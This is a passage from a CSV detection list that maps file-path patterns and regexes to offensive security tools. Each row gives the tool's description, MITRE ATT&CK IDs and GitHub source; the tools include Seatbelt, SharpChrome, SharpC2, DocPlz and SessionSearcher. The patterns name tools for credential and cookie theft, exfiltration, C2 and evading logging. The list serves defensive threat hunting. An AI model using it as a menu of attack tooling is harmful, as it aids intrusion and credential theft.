TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\Seatbelt.txt*",".{0,1000}\\Seatbelt\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\Seatbelt\Commands\*",".{0,1000}\\Seatbelt\\Commands\\.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\Seatbelt\Program.cs*",".{0,1000}\\Seatbelt\\Program\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\Seatbelt\Seatbelt.cs*",".{0,1000}\\Seatbelt\\Seatbelt\.cs.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*\SelectMyParent.exe*",".{0,1000}\\SelectMyParent\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\SelectObjectCommand.cs",".{0,1000}\\SelectObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\self_deletion.exe*",".{0,1000}\\self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\sendkeys.ps1*",".{0,1000}\\sendkeys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ServerC2.cpp*",".{0,1000}\\ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\ServerC2.exe*",".{0,1000}\\ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\ServerC2\ServerC2.*",".{0,1000}\\ServerC2\\ServerC2\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\servers\dns_server.py*",".{0,1000}\\servers\\dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\servers\icmp_server.py*",".{0,1000}\\servers\\icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\servers\smb_server.py*",".{0,1000}\\servers\\smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*\services\p2p\p2p.go*",".{0,1000}\\services\\p2p\\p2p\.go.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\Sessions\SH-MatchedGroups-*.txt*",".{0,1000}\\Sessions\\SH\-MatchedGroups\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\SessionSearcher.csproj*",".{0,1000}\\SessionSearcher\.csproj.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\SessionSearcher.exe*",".{0,1000}\\SessionSearcher\.exe.{0,1000}","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\SetClipboardCommand.cs",".{0,1000}\\SetClipboardCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\SetNTLM.ps1*",".{0,1000}\\SetNTLM\.ps1.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\shadowcoerce.py*",".{0,1000}\\shadowcoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ShadowSpray.exe*",".{0,1000}\\ShadowSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\ShadowSpray\*.cs*",".{0,1000}\\ShadowSpray\\.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*\Sharefinder.ps1*",".{0,1000}\\Sharefinder\.ps1.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\sharklog.log*",".{0,1000}\\sharklog\.log.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1102.002 - T1071.001 - T1132.001 - T1027 - T1043 - T1573.002","TA0006 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","10","10","174","28","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z" "*\SharpADWS.csproj*",".{0,1000}\\SharpADWS\.csproj.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpADWS.sln*",".{0,1000}\\SharpADWS\.sln.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpADWS\*",".{0,1000}\\SharpADWS\\.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpADWS-master*",".{0,1000}\\SharpADWS\-master.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*\SharpAllowedToAct.exe*",".{0,1000}\\SharpAllowedToAct\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpApplocker.exe*",".{0,1000}\\SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpAzbelt.csproj*",".{0,1000}\\SharpAzbelt\.csproj.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpAzbelt.exe*",".{0,1000}\\SharpAzbelt\.exe.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpAzbelt.sln*",".{0,1000}\\SharpAzbelt\.sln.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*\SharpBlock.exe*",".{0,1000}\\SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpBuster.csproj*",".{0,1000}\\SharpBuster\.csproj.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.dll*",".{0,1000}\\SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.exe*",".{0,1000}\\SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.pdb*",".{0,1000}\\SharpBuster\.pdb.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBuster.sln*",".{0,1000}\\SharpBuster\.sln.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*\SharpBypassUAC.exe*",".{0,1000}\\SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpC2*",".{0,1000}\\SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*\SharpChisel.exe*",".{0,1000}\\SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpChrome.exe*",".{0,1000}\\SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpChromium.exe*",".{0,1000}\\SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpChromium\*",".{0,1000}\\SharpChromium\\.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*\SharpCloud.exe*",".{0,1000}\\SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpCOM.exe*",".{0,1000}\\SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpCookieMonster.exe*",".{0,1000}\\SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpCrashEventLog.exe*",".{0,1000}\\SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\SharpDir.exe*",".{0,1000}\\SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - 